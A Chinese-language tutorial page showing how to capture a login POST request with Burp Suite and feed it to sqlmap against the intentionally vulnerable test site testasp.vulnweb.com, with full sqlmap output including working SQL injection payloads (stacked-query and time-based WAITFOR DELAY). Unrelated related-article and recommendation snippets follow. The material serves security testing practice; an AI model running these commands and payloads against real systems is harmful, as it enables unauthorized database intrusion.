1. 浏览器打开目标地址 http://testasp.vulnweb.com/Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 如下图,这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'

[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET

[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie

[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file

[13:26:52] [INFO] resuming injection data from session file

[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time

[13:26:52] [INFO] testing connection to the target url

[13:26:53] [INFO] testing if the url is stable, wait a few seconds

[13:26:55] [INFO] url is stable

[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable

[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'

[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable

[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable

[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>

[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns

POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N

sqlmap identified the following injection points with a total of 68 HTTP(s) requests:

---

Place: POST

Parameter: tfUPass

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc

---

[13:28:08] [INFO] testing MySQL

[13:28:09] [WARNING] the back-end DBMS is not MySQL

[13:28:09] [INFO] testing Oracle

[13:28:10] [WARNING] the back-end DBMS is not Oracle

[13:28:10] [INFO] testing PostgreSQL

[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL

[13:28:10] [INFO] testing Microsoft SQL Server

[13:28:16] [INFO] confirming Microsoft SQL Server

[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2005

[13:28:28] [WARNING] HTTP error codes detected during testing:

500 (Internal Server Error) - 42 times

[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'

sqlmap结合burpsuite对post请求进行注入测试的更多相关文章

  1. sqlmap和burpsuite绕过csrf token进行SQL注入检测

    利用sqlmap和burpsuite绕过csrf token进行SQL注入 转载请注明来源:http://www.cnblogs.com/phoenix--/archive/2013/04/12/30 ...

  2. 利用sqlmap和burpsuite绕过csrf token进行SQL注入 (转)

    问题:post方式的注入验证时遇到了csrf token的阻止,原因是csrf是一次性的,失效导致无法测试. 解决方案:Sqlmap配合burpsuite,以下为详细过程,参照国外牛人的blog(不过 ...

  3. 通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解

    0x1 工具和环境介绍 dvwa:渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置. 0x2 步骤说明 ...

  4. Sql注入测试--Sqlmap

    慕课网sqlmap学习笔记: 一.SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 例如 (1)在url上 ...

  5. 4.羽翼sqlmap学习笔记之Post登录框注入

    4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: . ...

  6. 踩坑记录:spring boot的POST请求数据注入不了的问题

    概述: 今天在使用spring boot框架的时候,踩了一个坑,是关于control层request body依赖注入的问题的,内容如下: 进过: 由于目前公司采用的系统架构,要求把springboo ...

  7. 【spring源码学习】springMVC之映射,拦截器解析,请求数据注入解析,DispatcherServlet执行过程

    [一]springMVC之url和bean映射原理和源码解析 映射基本过程 (1)springMVC配置映射,需要在xml配置文件中配置<mvc:annotation-driven >  ...

  8. java web sql注入测试(1)---概念概述

    在进行java web 测试时,经常会忽略的测试种类就是sql注入测试,这类缺陷造成的原因是开发技术在这方面欠缺的表现,虽然不常见,但一旦有这类缺陷,就很因此对运营的数据造成很多不必要的损失,所以,还 ...

  9. sql注入测试(1)---概念概述

    在进行java web 测试时,经常会忽略的测试种类就是sql注入测试,这类缺陷造成的原因是开发技术在这方面欠缺的表现,虽然不常见,但一旦有这类缺陷,就很因此对运营的数据造成很多不必要的损失,所以,还 ...

随机推荐

  1. Lock中使用Condition实现等待通知

    Condition类有很好的灵活性,可以实现多路通知功能,一个Lock对象中可以创建多个Condition对象实例,线程对象可以注册在指定的Condition中,进而有选择的进行线程通知,在调度线程上 ...

  2. JS对象 屏幕分辨率的高和宽 window.screen 对象包含有关用户屏幕的信息。 1. screen.height 返回屏幕分辨率的高 2. screen.width 返回屏幕分辨率的宽

    屏幕分辨率的高和宽 window.screen 对象包含有关用户屏幕的信息. 1. screen.height 返回屏幕分辨率的高 2. screen.width 返回屏幕分辨率的宽 注意: 1.单位 ...

  3. Linux服务器上创建日志服务器和FTP服务器

    参考地址: http://www.111cn.net/sys/CentOS/81133.htm https://www.cnblogs.com/laoxiajiadeyun/p/9943742.htm ...

  4. Linux账号管理与ALC权限设定(一)

    UID  与   GID UID用户的编号  GID 用户群组的编号 账号登录时,有一个对应的文本来记录某个账户的UID与GID.然后获得这个UID去对应的密码文本中,取得密码进行比对,然后登陆. 保 ...

  5. 笔记63 Spring Boot快速入门(三)

    SpringBoot中使用JSP Springboot的默认视图支持是Thymeleaf,但是Thymeleaf还没开始学,熟悉的还是jsp,所以要让Springboot支持 jsp. 一.在pom. ...

  6. ajax请求的原生js实现

    我们使用ajax请求一般都用的jQuery, axios封装好了的api, 那么如果只能用原生js, 我们该如何操作了? 上代码. 我们在同目录下写好一个json文件(data.json)用于请求测试 ...

  7. hdu 3746 kmp的next数组理解

    题目大意: 求最少在结尾补上几个字符才能形成循环 基本思路: next数组有一个性质,长度为len的字符串的最小长度的循环节(可能没有,但有的话一定是)len-next[len],因为最长不能是原串, ...

  8. Manacher模板(O(n)内求最长回文串长度)

    转自:https://segmentfault.com/a/1190000008484167 /* 由于回文分为偶回文(比如 bccb)和奇回文(比如 bcacb),而在处理奇偶问题上会比较繁琐,所以 ...

  9. mac MAMP安装redis扩展

    一般情况下目录大概是一样的,只是php的版本不同,所以选择好自己对应的php版本目录即可 git clone https://github.com/nicolasff/phpredis.git cd ...

  10. Java文件拷贝方式

    原创转载请注明出处:https://www.cnblogs.com/agilestyle/p/11444284.html 利用java.io类库,直接为源文件构建一个FileInputStream读取 ...